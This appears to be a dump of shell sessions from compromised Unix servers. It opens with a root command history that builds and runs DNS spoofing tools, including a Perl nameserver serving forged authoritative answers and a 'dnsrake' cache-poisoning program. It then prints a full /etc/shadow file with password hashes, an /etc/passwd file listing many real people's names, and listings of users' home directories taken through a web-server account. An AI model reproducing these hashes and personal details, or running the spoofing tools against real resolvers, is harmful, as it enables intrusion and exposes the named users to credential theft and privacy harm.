ls - l
ls -l
mysqldump toorcamp | less
mysqldump toorcamp | less
mysqldump toorcamp > toorcamp.sql
ls -l toorcamp.sql 
mysql toorcamp
cd
perl dns.pl 
fg
vim dns.pl 
perl dns.pl 
perl dns.pl 
fg
perl dns.pl 
fg
vim dns.pl 
perl dns.pl 
vim phonym.c 
ls
perl dns.pl 
cd
vim phonym.c 
gcc -o phonym phonym.c  -ldns
gcc -o phonym phonym.c  -lldns
./phonym com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
while [ 1 ] ; do ./phonym doxpara.com; done
while [ 1 ] ; do ./phonym doxpara.com; done
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
gf
fg
vim phonym.c 
ls
apt-cache search ldns
wget http://www.nlnetlabs.nl/downloads/ldns/ldns-1.5.1.tar.gz
tar xzvf ldns-1.5.1.tar.gz 
cd ldns-1.5.1
ls
./configure 
apt-get install openssl-dev
apt-cache search ssl
apt-get install libssl-dev
apt-get update
apt-get install libssl-dev
./configure 
make -j2
make install
cd
gcc -o phonym phonym.c 
touch config.h
gcc -o phonym phonym.c 
gcc -o phonym phonym.c  -ldns
gcc -o phonym phonym.c  -lldns
./phonym doxpara.com
ln -s /usr/local/lib/libldns.so.1 /usr/lib/libldns.so.1
./phonym doxpara.com
./phonym doxpara.com
dig @backend.doxpara.com foo.com
dig @backend.doxpara.com foobar.com
fg
vim phonym.c 
gcc -o phonym phonym.c  -lldns
./phonym doxpara.com
ifconfig 
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
./phonym doxpara.com
screen -D -R
screen -D -R
cd
perl dns
perl dns.pl 
fg
vim dns.pl 
perl dns.pl 
fg
perl dns.pl 
fg
perl dns.pl 
fg
perl dns.pl 
fg
perl dns.pl 
fg
perl dns.pl 
fg
perl dns.pl 
ls
ls -l
man emacs
emacs
man vi
man vim
ls ../
pwd
home
ls ../usr/
ls ../home
ls /bin
exit
exit
exit
w
ls
screen -D -R
ls
vim dnsrake_hacdc.c 
gcc -o phonym phonym.c  -lldns
gcc -o dnsrake_hacdc dnsrake_hacdc.c 
perl hacdcdemo.pl 
ps axf | grep -i perl
ps axf | grep -i pl
perl hacdcdemo.pl 
vim hacdcdemo.pl 
perl hacdcdemo.pl 
vim hacdcdemo.pl 
perl hacdcdemo.pl 
fg
vim hacdcdemo.pl 
perl hacdcdemo.pl 
screen -d -R
screen -D -R
gcc -o dnsrake_hacdc dnsrake_hacdc.c 
./dnsrake_hacdc 209.40.204.174 65.54.240.126 www.doxpara.com 1203 6.6.6.6 500 $RANDOM.www.doxpara.com
./dnsrake_hacdc 209.40.204.174 65.54.240.126 www.doxpara.com 1203 6.6.6.6 500 $RANDOM.www.doxpara.com
ifconfig 
ps -axf | grep perl
kill 29374
ps -axf | grep perl
screen -D -R
curl http://68.49.183.84
curl http://68.49.183.84
ls
ls -l *.pl
dig @deluvian.doxpara.com foo.com
dig +dnssec @deluvian.doxpara.com foo.com
dig +dnssec @deluvian.doxpara.com yahoo.com
dig +dnssec @deluvian.doxpara.com yahoo.com +short
dig +dnssec @deluvian.doxpara.com cnn.com +short
dig +dnssec @deluvian.doxpara.com metafilter.com +short
dig +dnssec @deluvian.doxpara.com facebook.com +short
dig +dnssec @deluvian.doxpara.com facebook.com +short
dig +dnssec @deluvian.doxpara.com facebook.com +short
dig +dnssec @deluvian.doxpara.com facebook.com +short
dig +dnssec @deluvian.doxpara.com facebook.com +short
dig +dnssec @deluvian.doxpara.com facebook.com +short
dig +dnssec @deluvian.doxpara.com facebook.com +short
dig +dnssec @deluvian.doxpara.com facebook.com +short
dig +dnssec @deluvian.doxpara.com facebook.com +short
dig +dnssec @deluvian.doxpara.com facebook.com +short
dig +dnssec @deluvian.doxpara.com www.cnn.com +short
ps ax 
  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:00 init [2]                     
    2 ?        S      0:00 [migration/0]
    3 ?        SN     0:00 [ksoftirqd/0]
    4 ?        S      0:00 [watchdog/0]
    5 ?        S<     0:00 [events/0]
    6 ?        S<     0:00 [khelper]
    7 ?        S<     0:00 [kthread]
    9 ?        S<     0:00 [xenwatch]
   10 ?        S<     0:00 [xenbus]
   16 ?        S<     0:00 [kblockd/0]
   17 ?        S<     0:00 [cqueue/0]
   21 ?        S<     0:00 [khubd]
   23 ?        S<     0:00 [kseriod]
   76 ?        S      0:00 [pdflush]
   78 ?        D<     0:00 [kswapd0]
   79 ?        S<     0:00 [aio/0]
  220 ?        S<     0:00 [kpsmoused]
  243 ?        S<     0:00 [ata/0]
  244 ?        S<     0:00 [ata_aux]
  255 ?        S<     0:00 [ksnapd]
  260 ?        S<     0:03 [kjournald]
  346 ?        S<s    0:00 /sbin/udevd --daemon
  890 ?        Ss     0:06 /sbin/syslogd -u syslog
  914 ?        S      0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
  916 ?        Ss     0:00 /sbin/klogd -P /var/run/klogd/kmsg
  937 ?        Ss     0:00 /usr/sbin/sshd
  995 ?        S      0:00 /bin/sh /usr/bin/mysqld_safe
 1047 ?        Sl     0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
 1049 ?        S      0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
 1214 ?        Ss     0:00 /usr/lib/postfix/master
 1220 ?        S      0:00 qmgr -l -t fifo -u
 1240 ?        Ss     0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
 1254 ?        Ss     0:00 /usr/sbin/dovecot
 1259 ?        S      0:00 dovecot-auth
 1274 ?        Ss     0:00 /usr/sbin/apache2 -k start
 1295 ?        S      0:00 /usr/sbin/apache2 -k start
 1296 ?        S      0:00 /usr/sbin/apache2 -k start
 1297 ?        S      0:00 /usr/sbin/apache2 -k start
 1298 ?        S      0:00 /usr/sbin/apache2 -k start
 1299 ?        S      0:00 /usr/sbin/apache2 -k start
 1309 ?        Ss     0:00 /bin/bash --
 1321 ?        S      0:00 /usr/sbin/apache2 -k start
 1322 ?        S      0:00 /usr/sbin/apache2 -k start
 1323 ?        S      0:00 /usr/sbin/apache2 -k start
 1328 ?        S      0:00 tlsmgr -l -t unix -u -c
 2399 ?        S      0:00 /usr/sbin/apache2 -k start
 6520 ?        S      0:00 /usr/sbin/apache2 -k start
13879 ?        S      0:00 [pdflush]
27387 ?        S      0:00 pickup -l -t fifo -u -c
27804 ?        Ss     0:00 sshd: root@notty 
27808 ?        Ss     0:00 -bash
27832 ?        Ss     0:00 sshd: unknown [priv]
27833 ?        S      0:00 sshd: unknown [net]
27834 ?        R      0:00 ps ax
cat dns.pl
 #!/usr/bin/perl 
 
 use Net::DNS::Nameserver;
 use strict;
 use warnings;
 
 sub reply_handler {
         my ($qname, $qclass, $qtype, $peerhost,$query) = @_;
         my ($rcode, @ans, @auth, @add);

         print "Received query from $peerhost\n";
         $query->print;

	 my $ttl = 300;

         
         if ($qtype eq "A" and $qname ne "ns1.toorrr.com") {
		push @ans, Net::DNS::RR->new("$qname $ttl $qclass CNAME www.doxpara.com");
		push @ans, Net::DNS::RR->new("$qname $ttl $qclass A 4.3.2.1");
		#push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 1.2.3.4");
		#push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 209.200.168.66");
                 $rcode = "NOERROR";
	 }
         elsif ($qtype eq "A" and $qname eq "ns1.toorrr.com") {
		push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 1.2.3.4");
		push @ans, Net::DNS::RR->new("ns1.toorrr.com $ttl $qclass A 209.200.168.66");
                 $rcode = "NOERROR";
	
         }elsif( $qtype eq "MX" ) {
                 push @ans, Net::DNS::RR->new("$qname $ttl $qclass $qtype 10 mail.$qname");
                 push @add, Net::DNS::RR->new("mail.$qname $ttl $qclass A 209.40.204.236");
                 $rcode = "NOERROR";

         }else{
                  $rcode = "NXDOMAIN";
         }
         

         # mark the answer as authoritive (by setting the 'aa' flag
         return ($rcode, \@ans, \@auth, \@add, { aa => 1 });
 }
 
 my $ns = Net::DNS::Nameserver->new(
     LocalPort    => 53,
     ReplyHandler => \&reply_handler,
     Verbose      => 2,
 ) || die "couldn't create nameserver object\n";

 $ns->main_loop;
head -n 10 dnsrake_hacdc.c
#define __FAVOR_BSD
#define FAVOR_BSD 

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/udp.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <inttypes.h>
cat mail.pl
use IO::Socket::INET;
use Net::Server::Mail::SMTP;
use Data::Dumper;
use MIME::QuotedPrint;
   

    my @local_domains = qw(example.com example.org);
    my $server = new IO::Socket::INET Listen => 1, LocalPort => 25, ReuseAddr=>1;
    
    my $conn;
    while($conn = $server->accept)
    {
        my $smtp = new Net::Server::Mail::SMTP socket => $conn;
        $smtp->set_callback(RCPT => \&validate_recipient);
        $smtp->set_callback(DATA => \&queue_message);
        $smtp->process();
        $conn->close();
    }

    sub validate_recipient
    {
        my($session, $recipient) = @_;

        return(1);
    }

    sub queue_message
    {
        my($session, $data) = @_;
        print decode_qp($$data);
        return(1, 250, "message queued");
    }
cat /etc/shadow
root:$1$Qa/UTuhe$mxFnYK2t788AwbgOP.e6Q/:14280:0:99999:7:::
daemon:*:14131:0:99999:7:::
bin:*:14131:0:99999:7:::
sys:*:14131:0:99999:7:::
sync:*:14131:0:99999:7:::
games:*:14131:0:99999:7:::
man:*:14131:0:99999:7:::
lp:*:14131:0:99999:7:::
mail:*:14131:0:99999:7:::
news:*:14131:0:99999:7:::
uucp:*:14131:0:99999:7:::
proxy:*:14131:0:99999:7:::
www-data:*:14131:0:99999:7:::
backup:*:14131:0:99999:7:::
list:*:14131:0:99999:7:::
irc:*:14131:0:99999:7:::
gnats:*:14131:0:99999:7:::
nobody:*:14131:0:99999:7:::
libuuid:!:14131:0:99999:7:::
dhcp:*:14131:0:99999:7:::
syslog:*:14131:0:99999:7:::
klog:*:14131:0:99999:7:::
sshd:*:14131:0:99999:7:::
mysql:!:14132:0:99999:7:::
postfix:*:14236:0:99999:7:::
dovecot:*:14236:0:99999:7:::
maildrop:$1$D6ET03sF$UUYNboLjEtwUO3JbOsJEp1:14236:0:99999:7:::


                 !~~~~~~~~~~~ www.doxpara.com ~~~~~~~~~~!

$ uname -a; id
FreeBSD shaitan1.lightconsulting.com 6.2-RELEASE-p4 FreeBSD 6.2-RELEASE-p4 #0: Thu Apr 26 17:40:53 UTC 2007     root@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
uid=80(www) gid=80(www) groups=80(www), 1001(thalakan), 1056(skippy)
$ pwd
/
$ cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
thalakan:*:1001:1001:Jason Spence:/home/thalakan:/bin/tcsh
nouveaux:*:1006:1006:nouveaux:/home/nouveaux:/usr/local/bin/bash
jspence:*:1001:1001:JSpence:/home/jspence:/usr/local/bin/bash
atheris:*:1000:1000:Atheris:/home/atheris:/usr/local/bin/bash
sokol:*:1010:1010:John Sokol:/home/sokol:/bin/sh
vintasia:*:1008:1008:vintasia:/home/vintasia:/usr/local/bin/bash
arc:*:1004:1004:archives user:/home/arc:/nonexistent
rsb:*:1009:1009:Rich Bodo:/home/rsb:/usr/local/bin/bash
eschur:*:1003:1003:Ethan Schur:/home/eschur:/bin/tcsh
zahl:*:1005:1005:Bleu Zahl:/home/zahl:/usr/local/bin/bash
fia:*:1012:1012:Fernando's Insurance:/home/fia:/nonexistent
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/sbin/nologin
eddyboy:*:1007:1007:Ed Vergara:/home/eddyboy:/usr/local/bin/bash
ragingworker:*:1013:1013:john McGee:/home/ragingworker:/usr/local/bin/bash
jlm:*:1014:1014:John McGuffick:/home/jlm:/usr/local/bin/bash
greasythug:*:1015:1015:Kae Saeteurn:/home/greasythug:/usr/local/bin/bash
donnamatrix:*:1016:1016:Stephanie I don't have a last name:/home/donnamatrix:/usr/local/bin/bash
dmarti:*:1017:1017:Don Marti:/home/dmarti:/usr/local/bin/bash
schoen:*:1018:1018:Seth Schoen:/home/schoen:/usr/local/bin/bash
unixsurplus:*:1019:1019:John Bodo:/home/unixsurplus:/usr/local/bin/bash
nblasgen:*:1020:1020:Nick Blasgen:/home/nblasgen:/usr/local/bin/bash
jbodo[disabled]:*:1021:1019:John Bodo:/home/jbodo:/usr/local/bin/bash
dan:*:1022:1022:Dan Kaminski:/home/dan:/usr/local/bin/bash
debian:*:1023:1023:Debian Archives:/home/debian:/usr/bin/bash
lspencedsn:*:1024:1024:Linda Spence:/home/lspencedsn:/usr/local/bin/bash
mbagley:*:1011:1011:Mark Bagley:/home/mbagley:/bin/tcsh
www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
effugas:*:1025:1025:Dan Kaminsky:/home/effugas:/usr/local/bin/bash
pj:*:1026:1026:Packet Junkie:/home/pj:/usr/local/bin/bash
mailman:*:91:91:Mailman User:/usr/local/mailman:/sbin/nologin
ftpunixsurplus:*:1027:1027:Unix Surplus FTP:/home/ftpunixsurplus:/usr/local/bin/bash
nagios:*:1028:1028:Nagios pseudo-user:/usr/local/var/nagios:/nonexistent
x30n:*:1029:1029:x30n:/home/x30n:/usr/local/bin/bash
addp4:*:1030:1030:addp4:/home/addp4:/usr/local/bin/bash
test1:*:1031:1019:test1:/home/test1:/usr/bin/bash
gpower:*:1032:1019:unixsurplus:/home/unixsurplus:/usr/local/bin/bash
geeksupply:*:1033:1019:unixsurplus:/home/unixsurplus:/usr/local/bin/bash
digrev:*:1034:1034:Digital Revelation:/home/digrev:/usr/local/bin/bash
beansprout:*:1035:1035:Kevin Sexton:/home/beansprout:/usr/local/bin/bash
submicron:*:1037:1037:Gary Buckmaster:/home/submicron:/usr/local/bin/bash
hackerjoe:*:1038:1038:Hacker Joe:/home/hackerjoe:/usr/local/bin/bash
pond:*:1039:1039:The Pond:/home/pond:/usr/local/bin/bash
oracle:*:1036:999:oracle:/home/oracle:/usr/local/bin/bash
drfed:*:1040:1040:Dr. Fed:/home/drfed:/usr/local/bin/bash
visigoth:*:1041:1041:visigoth:/home/visigoth:/usr/local/bin/bash
tagrrr:*:1042:1042:tagrrr:/home/tagrrr:/usr/local/bin/bash
freak:*:1043:1043:freak:/home/freak:/usr/local/bin/bash
temtel:*:1044:1044:temtel:/home/temtel:/usr/local/bin/bash
peter:*:1002:1002:Peter Wang:/home/peter:/usr/local/bin/bash
anoncvs:*:1045:1045:anoncvs:/home/anoncvs:/usr/local/bin/bash
multivac:*:1046:1046:Mike Jerabek:/home/multivac:/usr/local/bin/bash
ej:*:1049:1049:Eugenio Jarosiewicz:/home/ej:/usr/local/bin/bash
jnoland:*:1050:1050:jnoland:/home/jnoland:/usr/local/bin/bash
dnetc:*:105:105:distributed.net client pseudo-user:/nonexistent:/sbin/nologin
aquafire:*:1048:1048:aquafire:/home/aquafire:/usr/local/bin/bash
dimsum:*:1051:1051:dimsum:/home/dimsum:/usr/local/bin/bash
travis:*:1052:1052:travis:/home/travis:/usr/local/bin/bash
dtopham:*:1053:1053:User &:/home/dtopham:/bin/sh
gdm:*:92:92:GNOME Display Manager:/nonexistent:/sbin/nologin
v1ru5:*:1054:1054:User &:/home/v1ru5:/bin/sh
pgibson:*:1055:1055:User &:/home/pgibson:/bin/sh
skippy:*:1056:1056:User &:/home/skippy:/usr/local/bin/bash
brian:*:1057:1057:User &:/home/brian:/bin/sh
sith:*:1058:1058:sucka please,around the belly button:/home/sith:/usr/local/bin/bash
dovecot:*:1059:1059:Dovecot:/home/dovecot:/sbin/nologin
bob:*:1060:1060:User &:/home/bob:/bin/shh
abaddon:*:1061:1062:User &:/home/abaddon:/bin/sh
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
six:*:1062:1063:User &:/home/six:/bin/sh
frog:*:1063:1064:User &:/home/frog:/bin/sh
mother:*:1064:1065:Greg Carothers:/home/mother:/usr/local/bin/bash
anonpoet:*:1065:1066:User &:/home/anonpoet:/bin/sh
drifter:*:1066:1067:Drifter:/home/drifter:/usr/local/bin/bash
plastic:*:1067:1068:User &:/home/plastic:/bin/sh
tspwh:*:1068:1069:User &:/home/tspwh:/bin/sh
darch:*:1069:1070:User &:/home/darch:/bin/sh
wd40:*:1070:1071:User &:/home/wd40:/bin/sh
iphelix:*:1071:1072:User &:/home/iphelix:/bin/sh
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
nightfall:*:1072:1073:User &:/home/nightfall:/bin/sh
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
bannor:*:1073:1074:User &:/home/bannor:/bin/sh
unredo:*:1074:1075:User &:/home/unredo:/bin/sh
mct:*:1075:1076:User &:/home/mct:/bin/sh
t:*:1076:1077:User &:/home/t:/bin/sh
$ cd /home
$ ls -al
total 248974
drwxr-xr-x   73 root            wheel                1536 Jun 26 04:56 .
drwxr-xr-x   16 root            wheel                 512 Sep 22  2007 ..
drwxr-xr-x    3 abaddon         abaddon               512 Dec 31  2005 abaddon
drwxr-xr-x    2 addp4           addp4                 512 Oct 30  2002 addp4
drwxr-xr-x    2 anoncvs         anoncvs               512 Sep 29  2003 anoncvs
drwxr-xr-x    2 anonpoet        anonpoet              512 May 10  2006 anonpoet
drwxr-xr-x    5 aquafire        aquafire              512 Jul 19  2006 aquafire
drwxr-xr-x    2 arc             arc                   512 Apr  9  2003 arc
drwxr-xr-x   18 atheris         atheris              1024 Apr 23 23:31 atheris
drwxr-xr-x    3 bannor          bannor                512 Jan 24 05:51 bannor
drwxr-xr-x    2 beansprout      beansprout            512 Feb 26  2003 beansprout
drwxr-xr-x    3 bob             bob                   512 Mar 27  2006 bob
drwxr-xr-x    2 brian           brian                 512 May  5  2005 brian
drwxr-xr-x    2 dan             dan                   512 Mar  7  2002 dan
drwxr-xr-x    2 darch           darch                 512 Dec  4  2006 darch
drwxr-xr-x    2 debian          debian                512 Aug 22  2005 debian
drwxrwx---   21 digrev          digrev               1024 Jul 30  2006 digrev
drwxr-xr-x    6 dimsum          dimsum                512 Apr 17  2006 dimsum
drwxr-xr-x    3 dmarti          dmarti                512 Jan 24  2002 dmarti
drwxr-xr-x    2 donnamatrix     donnamatrix           512 Jan 24  2002 donnamatrix
drwxr-xr-x    2 drfed           drfed                 512 Jul  5  2003 drfed
drwxr-xr-x    4 drifter         drifter               512 Dec  4  2006 drifter
drwxr-xr-x    2 dtopham         dtopham               512 Feb 15  2005 dtopham
drwxr-xr-x    3 eddyboy         eddyboy               512 Jan 24  2002 eddyboy
drwxr-xr-x   31 effugas         effugas              2048 Sep 22  2008 effugas
drwxr-xr-x    3 ej              ej                    512 Jun  4  2004 ej
drwxr-xr-x   26 eschur          eschur               1536 Nov  3  2007 eschur
drwxr-xr-x    2 fia             fia                   512 Jan 24  2002 fia
drwx------   12 freak           freak                1024 Feb 21  2008 freak
drwxr-xr-x    2 ftpunixsurplus  ftpunixsurplus        512 Aug 27  2002 ftpunixsurplus
drwxr-xr-x    2 greasythug      greasythug            512 Jan 24  2002 greasythug
drwxr-xr-x    2 hackerjoe       hackerjoe             512 Apr 23  2003 hackerjoe
drwxr-xr-x    2 iphelix         iphelix               512 Sep 11  2007 iphelix
-rw-r--r--    1 root            wheel           254609557 Oct  2  2007 jbodo.tar.gz
drwxr-xr-x    2 jlm             jlm                   512 Jan 24  2002 jlm
drwxr-xr-x    3 jnoland         jnoland               512 Sep 24  2007 jnoland
drwx------    2 nobody          effugas               512 Mar 12  2007 lost+found
drwxr-xr-x    2 lspencedsn      lspencedsn            512 Jun  2  2002 lspencedsn
drwxr-xr-x    6 mbagley         mbagley               512 Jan 30  2008 mbagley
drwxr-xr-x    2 mct             mct                   512 Jun  9 01:15 mct
drwxr-xr-x    5 mother          mother                512 Dec 23  2007 mother
drwxr-xr-x    4 multivac        multivac              512 Apr  1 20:04 multivac
drwxr-xr-x    3 nblasgen        nblasgen              512 May 23  2007 nblasgen
drwxr-xr-x    2 nightfall       nightfall             512 Oct  8  2007 nightfall
drwx--x--x   33 nouveaux        nouveaux             3072 Jul 18  2008 nouveaux
drwxr-xr-x    3 oracle          oracle                512 Jun  3  2004 oracle
drwxr-xr-x    5 peter           peter                 512 Sep 13  2006 peter
drwxr-xr-x    3 pgibson         pgibson               512 Apr 18  2005 pgibson
drwxr-xr-x    3 pj              pj                    512 Dec 19  2002 pj
drwx------    3 plastic         plastic               512 Feb  6 12:59 plastic
drwxr-x--x   11 pond            pond                 1024 Sep  3  2007 pond
drwxr-xr-x    3 ragingworker    ragingworker          512 Feb 25  2002 ragingworker
drwxr-xr-x    6 rsb             rsb                   512 Jan 24  2002 rsb
drwxr-xr-x    2 schoen          schoen                512 Jan 24  2002 schoen
drwx------    6 sith            sith                  512 Jun 10  2006 sith
drwxrwsr-x    5 six             six                   512 Apr  8 01:09 six
-rw-r--r--    1 root            wheel                 800 Sep  3  2007 sizes
drwxr-x---    5 skippy          skippy                512 Oct 19  2005 skippy
drwxr-xr-x    3 sokol           sokol                 512 Aug 12  2006 sokol
drwxr-xr-x   11 submicron       submicron            1024 Mar 17  2008 submicron
drwxr-xr-x    3 t               t                     512 Jun 26 04:57 t
drwxr-xr-x    2 tagrrr          tagrrr                512 Jul 15  2003 tagrrr
drwxr-xr-x    6 temtel          temtel               1024 Jun  9  2006 temtel
drwxr-xr-x    2 test1           test1                 512 Aug 26  2005 test1
drwxr-x---  141 thalakan        thalakan            26112 Jul 20 09:10 thalakan
drwxr-xr-x    8 travis          travis                512 May  2  2006 travis
drwxr-xr-x    3 tspwh           tspwh                 512 Feb  1  2008 tspwh
drwxr-xr-x    9 atheris         atheris              1024 Sep 24  2007 unixsurplus
drwxr-xr-x    2 unredo          unredo                512 Mar 12 15:21 unredo
drwxr-xr-x    2 root            wheel                 512 Mar 13  2005 v1ru5
drwxr-xr-x    3 vintasia        vintasia              512 Jan 24  2002 vintasia
drwxr-xr-x    2 visigoth        visigoth              512 Jul  5  2003 visigoth
drwxr-xr-x    2 wd40            wd40                 2048 Sep 26  2007 wd40
drwxr-xr-x    7 x30n            x30n                  512 Nov 21  2006 x30n
drwxr-xr-x    8 zahl            zahl                 1024 Jun 25  2002 zahl
$ cd effugas
$ ls -al
total 9506018
-rw-r--r--    1 effugas  effugas         344 Feb 19  2006 !
drwxr-xr-x   31 effugas  effugas        2048 Sep 22  2008 .
drwxr-xr-x   73 root     wheel          1536 Jun 26 04:56 ..
drwx------    3 effugas  effugas         512 Sep 26  2005 .BitchX
-rw-------    1 effugas  effugas        7772 Jun  4 11:56 .bash_history
drwxr-xr-x    5 effugas  effugas         512 Oct 31  2005 .cpan
-rw-r--r--    1 effugas  effugas         771 Aug  9  2002 .cshrc
drwxr-xr-x    3 effugas  effugas         512 Mar 16  2005 .emacs.d
-rw-------    1 effugas  effugas          42 Sep 22  2008 .lesshst
drwx------    2 effugas  effugas         512 Feb 19  2006 .links
-rw-r--r--    1 effugas  effugas         255 Aug  9  2002 .login
-rw-r--r--    1 effugas  effugas         165 Aug  9  2002 .login_conf
-rw-------    1 effugas  effugas         371 Aug  9  2002 .mail_aliases
-rw-r--r--    1 effugas  effugas         331 Aug  9  2002 .mailrc
-rw-------    1 effugas  effugas        5478 Jul 25  2008 .mysql_history
-rw-r--r--    1 effugas  effugas         789 Aug  9  2002 .profile
-rw-------    1 effugas  effugas         276 Aug  9  2002 .rhosts
-rw-r--r--    1 effugas  effugas         852 Aug  9  2002 .shrc
drwxr-xr-x    2 effugas  effugas         512 Aug  1  2004 .ssh
-rw-r--r--    1 effugas  effugas      785514 Apr  3  2007 DSCF7896.JPG
drwxr-xr-x    2 effugas  effugas         512 Jun 28  2004 Desktop
-rw-r--r--    1 effugas  effugas       62548 Nov 29  2005 HTTP-Proxy.tar.gz
-rwxr-xr-x    1 effugas  effugas         266 Jan 29  2005 OzyBench.pm
-rwxr-xr-x    1 effugas  effugas        8872 Jan 29  2005 OzyResolve.pm
drwx------    2 effugas  effugas         512 Apr 14  2003 Pics
drwxr-xr-x    2 effugas  effugas         512 Dec 20  2004 admin
-rw-r--r--    1 effugas  effugas           0 Apr 16  2006 airhook-2.tar.gz
lrwxr-xr-x    1 effugas  effugas          26 Apr 16  2003 albums -> doxpara/pics/picKLE-albums
-rw-r--r--    1 effugas  effugas       29884 Apr 27  2006 cal311.rle
-rwx------    1 effugas  effugas       16384 Sep 30  2005 cc.doc
-rw-r--r--    1 effugas  effugas        2272 Dec 20  2004 ctry_usage_200412.png
-rw-r--r--    1 effugas  effugas        2501 Dec 20  2004 daily_usage_200412.png
-rw-r--r--    1 effugas  effugas           9 Nov 19  2007 delete_this_plz_k_thx
drwxr-xr-x    5 effugas  effugas         512 May 29  2005 dltrace-0.5
-rw-r--r--    1 effugas  effugas      198330 Apr 28  2005 dltrace-0.5.tar.bz2
drwxrwxrwx  124 effugas  effugas       28672 Jul 18 06:22 doxpara
-rw-r--r--    1 effugas  effugas      753427 Oct 17  2007 drupal-5.3.tar.gz
-rw-r--r--    1 effugas  effugas        1588 Dec 20  2004 hourly_usage_200412.png
-rw-r--r--    1 root     effugas   216555114 Jul 20 09:10 httpd-doxpara-error.log
-rw-r--r--    1 root     effugas  9452989787 Jul 20 09:10 httpd-doxpara.log
drwxr-xr-x    2 effugas  effugas         512 Jun 14  2005 huh
-rw-r--r--    1 effugas  effugas    10138487 Nov 24  2007 huh.gz
-rw-r--r--    1 effugas  effugas         104 Nov 24  2007 huh2.gz
-rw-r--r--    1 effugas  effugas    18093548 Nov 24  2007 huh_new.gz
-rw-r--r--    1 effugas  effugas    15748938 Nov 24  2007 huh_shai.gz
-rw-r--r--    1 effugas  effugas         617 Jul 28  2003 id_dsa-dan_needs_to_drink_more.pub
-rw-r--r--    1 effugas  effugas         236 Nov 14  2002 id_rsa.pub
drwxr-xr-x    2 effugas  effugas         512 Dec 25  2003 igi-udp
-rw-r--r--    1 effugas  effugas       18720 Mar 24  2003 igi-udp.tgz
-rw-r--r--    1 effugas  effugas           0 Sep 22  2008 index.html
-rw-r--r--    1 effugas  effugas        6552 Apr 27  2006 input.pgm
-rw-r--r--    1 effugas  effugas       19432 Apr 27  2006 input.ppm
-rw-r--r--    1 effugas  effugas       10516 Apr 27  2006 input.rle
drwx------    2 effugas  effugas         512 Sep  9  2005 mad_bike
drwxr-xr-x   10 effugas  effugas        1024 Nov  9  2002 minewt
-rw-r--r--    1 effugas  effugas    10832895 Jul  8  2008 new2.db.gz
drwxr-xr-x    2 effugas  effugas         512 Feb 20  2006 offline
drwxr-sr-x    2 effugas  effugas         512 Sep 16  2003 onesixtyone-0.3.1
drwxr-xr-x    2 effugas  effugas         512 Jan 19  2005 ozy2
-rwxr-xr-x    1 effugas  effugas         437 Jan 29  2005 ozybench.pl
drwxr-xr-x    4 effugas  effugas         512 Dec 25  2003 pathchirp-2.3.3
-rw-r--r--    1 effugas  effugas       60375 Sep 13  2003 pathchirp-2.3.3.tar.gz
drwxr-xr-x    3 effugas  effugas         512 Jan 28  2005 pathchirp-2.3.7
-rw-r--r--    1 effugas  effugas       59321 Sep  6  2004 pathchirp-2.3.7.tar.gz
drwxr-xr-x    3 effugas  effugas         512 Oct 31  2005 perl
drwxr-xr-x    3 effugas  effugas         512 Feb 19  2006 py
-rw-r--r--    1 effugas  effugas       37446 Nov 19  2002 ref
-rw-r--r--    1 effugas  effugas       41381 Dec  7  2004 ref.txt
-rw-r--r--    1 effugas  effugas       37446 Nov 19  2002 ref2
-rw-r--r--    1 effugas  effugas       65058 Nov 21  2002 ref3
